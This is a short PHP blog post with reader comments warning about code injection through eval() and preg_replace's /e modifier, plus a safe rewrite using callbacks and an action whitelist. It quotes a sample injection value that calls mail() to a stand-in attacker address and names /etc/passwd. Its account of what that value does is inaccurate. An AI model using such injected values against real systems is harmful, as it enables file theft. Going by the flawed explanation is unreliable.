PHP eval is evil

December 22, 2007

JSON creator Douglas Crockford has pointed out more than once that in JavaScript, eval is evil. In PHP, eval is also almost always evil (though some people say it can be useful in a few limited cases). I personally have no guts to use it. Allowing any user-supplied data to reach an eval( ) call is asking to be hacked.

eval( ) has aliases. Do not use the /e modifier with preg_replace( ): with /e, preg_replace( ) runs the replacement string through eval( ) as PHP code, which is especially dangerous if any user-entered data goes into the call.


So what does eval do? Given eval ( string $code_str ), eval evaluates the string in code_str as PHP code. Imagine you read a form's username field with eval($_POST['username']). If the hacker types the following value into the input field: mail("hacker@somewhere.com", "Some passwords", '/bin/cat /etc/passwd'), you will be sending your server password to the hacker.

So don’t use eval unless you are suicidal. ;)
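The two eval-prone patterns above (a preg_replace that evaluates its replacement, and behaviour picked from a request parameter), rewritten so that no user-controlled string is ever run as code. This is an added example, not code from the original post; the placeholder template, the action map and the $post array are constructed for illustration.

```php
<?php
// Added example (not from the original post). Two places where eval tends to
// creep into PHP code, each rewritten so user input stays data, never code.

// 1. Template expansion. The /e modifier would hand the replacement string to
//    eval(); preg_replace_callback calls an ordinary PHP function instead.
function expand(string $template, array $vars): string {
    return preg_replace_callback(
        '/\{\{(\w+)\}\}/',
        function (array $m) use ($vars): string {
            // Unknown placeholders are left as-is rather than guessed at.
            return array_key_exists($m[1], $vars) ? (string) $vars[$m[1]] : $m[0];
        },
        $template
    );
}

// 2. Selecting behaviour from a request parameter. Instead of eval'ing the
//    submitted text, keep an explicit map of allowed actions and look the
//    name up; anything not in the map is rejected before it is used.
$actions = [
    'greet' => function (string $who): string { return "Hello, $who"; },
    'shout' => function (string $who): string { return strtoupper($who) . '!'; },
];

function dispatch(array $actions, string $name, string $arg): string {
    if (!isset($actions[$name])) {
        throw new InvalidArgumentException("unknown action: $name");
    }
    return $actions[$name]($arg);
}

// Constructed input standing in for $_POST. The username value is the kind of
// string that eval($_POST['username']) would have executed; here it is only
// ever treated as text.
$post = ['action' => 'greet', 'username' => 'mail("x@example.com", "s", "b");'];

echo expand('Hi {{name}}, you are {{role}}.', ['name' => 'Alice', 'role' => 'editor']), "\n";
echo dispatch($actions, $post['action'], $post['username']), "\n";
```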




2 Comments so far

  1. Ross on September 3, 2008 7:14 am

    I find eval very helpful in variable setting examples, for example:

    eval('$this->debug =' . (IS_PHP4 ? '&' : '') . ' new stdClass();');

    The only cases where eval is "evil" are where you're inputting user data into eval - but you should be validating and sanitising any user input anyway.

  2. admin on September 3, 2008 9:43 am

    Hi, Ross

    In your case it provides convenience and is really helpful. What I mentioned in my post was more about the possible problems eval causes.

    Really appreciate your opinion. :)
